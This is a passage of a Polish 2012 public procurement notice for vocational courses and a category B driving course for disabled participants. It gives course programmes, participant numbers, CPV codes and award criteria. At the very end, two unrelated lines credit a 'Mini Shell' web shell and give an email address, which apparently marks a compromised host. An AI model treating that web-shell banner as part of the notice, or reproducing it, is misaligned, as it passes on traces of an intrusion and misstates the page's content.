3)	Kurs komputerowy - 64 godziny (średnio-zaawansowany, tj. 1. Microsoft Office Word 2007; 2. Microsoft Office Excel 2007; 3. Microsoft Office Access 2007; 4. Microsoft Office PowerPoint 2007, 5. Internet - Używanie przeglądarki, Korzystanie z sieci, Wydruki z sieci, Komunikacja elektroniczna, Korzystanie z e-maili, Zarządzanie skrzynką pocztową; 6. Obsługa podstawowych funkcji systemu Windows). Kurs kończy się uzyskaniem zaświadczenia/świadectwa/certyfikatu ukończenia kursu; 8 uczestników,

4)	Kurs florystyczny - 80 godzin ( w tym min 70 godz. zajęć praktycznych). Program kursu:, gatunki i pielęgnacja roślin, teoria florystyki oraz materiałoznawstwo, zasady kompozycji oraz teoria barw, organizacja miejsca pracy, w tym prowadzenie własnej działalności gospodarczej, BHP w zawodzie florysty, zajęcia praktyczne. Zajęcia praktyczne odbywać się będą z wykorzystaniem kwiatów ciętych, sztucznych oraz innych elementów dekoracyjnych w tym: układanie wiązanek okolicznościowych, ślubnych, pogrzebowych, świątecznych oraz układanie: kompozycji z kwiatów ciętych, koszy kwiatowych. Koszt kursu obejmuje wszelkie materiały szkoleniowe i florystyczne. Kurs kończy się uzyskaniem zaświadczenia/świadectwa/certyfikatu ukończenia kursu; 6 uczestników

5)	Kurs obsługi wózków widłowych (akumulatorowych, spalinowych) - 2-4 tygodnie (minimum 67 godzin), kurs obejmuje: podstawy prawne, transport wewnątrzzakładowy, budowa i działanie podzespołów, obsługa i eksploatacja, elektrotechnika, bhp, ppoż., pierwsza pomoc, jazda wózkami. Kurs obejmuje również szkolenie na wymianę butli gazowych LPG w wózku widłowym. Kurs kończy się uzyskaniem świadectwa ukończenia kursu 
i zaświadczenia Urzędu Dozoru Technicznego, uprawniającym do obsługi wózków widłowych; 6 uczestników,

6)	Kurs masażu - 70 godzin, kurs obejmuje: 1. Teoria masażu i techniki masażu klasycznego; 2. Anatomia i fizjologia - poznanie mechanizmu działania masażu i jego fizjologicznego wpływu na człowieka; 3. Masaż klasyczny: - zajęcia praktyczne, 
- nauka technik masażu, - masaż całościowy ciała, - masaż relaksacyjny, - masaż odchudzający; 4. Masaż leczniczy: - zajęcia praktyczne, - kształcenie umiejętności wykonania poszczególnych ruchów w masażu; 5. Masaż sportowy: - zajęcia praktyczne, - masaż sportowy w procesie odnowy biologicznej, - główne zasady i warunki wykonywania masażu sportowego, - rodzaje masażu sportowego; 6. Inne techniki: - zajęcia praktyczne, - poznanie dodatkowych technik masażu klasycznego. Kurs kończy się uzyskaniem zaświadczenia/świadectwa/certyfikatu ukończenia kursu; 6 uczestników;

7)	Kurs księgowo - kadrowy (podstawowy) - 100 godzin. Szkolenie przygotowujące do prowadzenia dokumentacji kadrowo - płacowej i zarządzania biurem, obejmujące zagadnienia: podstawy prawne i organizacyjne księgowości, konta księgowe, system prawa podatkowego w Polsce, formy rozliczania się podatników z Urzędem Skarbowym, zastosowanie zasad rachunkowości, podstawowe zasady ewidencji na kontach księgowych,  Zakładowy Plan Kont, organizacja obiegu dokumentów w firmie, sprawozdawczość finansowa, omówienie przykładowych dokumentów w księgowości, zestawienie obrotów i sald, bilans, rachunek przepływów środków pieniężnych, analiza wskaźnikowa, System Ubezpieczeń Społecznych, Ubezpieczenie zdrowotne, zgłoszenie i inne deklaracje do ZUS, rozliczenia z ZUS, Prawo Pracy i umowy cywilnoprawne,   dokumentacja pracownicza od CV do Świadectwa pracy, dane osobowe i ich przetwarzanie, potrącenia obligatoryjne i fakultatywne, podstawowa dokumentacja płacowa, naliczanie wynagrodzeń. Kurs kończy się uzyskaniem zaświadczenia/ świadectwa/certyfikatu ukończenia kursu; 2 uczestników;

8)	Kurs księgowo - kadrowy (średnio-zaawansowany) - 120 godzin. Szkolenie przygotowujące do prowadzenia dokumentacji kadrowo - płacowej i zarządzania biurem. Obsługa programu kadrowo - płacowego Gratyfikant, Rachmistrz, Symfonia, Płatnik, a także maszyn i urządzeń biurowych. Kurs kończy się uzyskaniem zaświadczenia/ świadectwa/certyfikatu ukończenia kursu; 2 uczestników;

9)	Kurs sprzedawcy z obsługą kasy fiskalnej. Tematyka zajęć: organizacja działalności handlowej, towar jako przedmiot handlu, sztuka sprzedawania, dokumentacja handlowa, wystawianie rachunków i faktur, etyka zawodu sprzedawcy, kultura obsługi klienta, obsługa kas fiskalnych, ćwiczenia z zakresu sprzedaży. Cykl szkolenia na kursie obejmuje: 23 godz. Teoretycznych, 67 godz. zajęć ćwiczeniowych. Kurs kończy się uzyskaniem zaświadczenia/świadectwa/ certyfikatu ukończenia kursu - 1 uczestnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zorganizowanie i przeprowadzenie kursu prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs prawa jazdy kat. B.
Liczba uczestników: 8 osób niepełnosprawnych. 
Wykonawca w cenie oferty zapewnia opłatę lekarza oraz pierwszą opłatę egzaminacyjną w Wojewódzkim Ośrodku Ruchu Drogowego. 
Kurs musi obyć się zgodnie z zasadami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz.1834 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com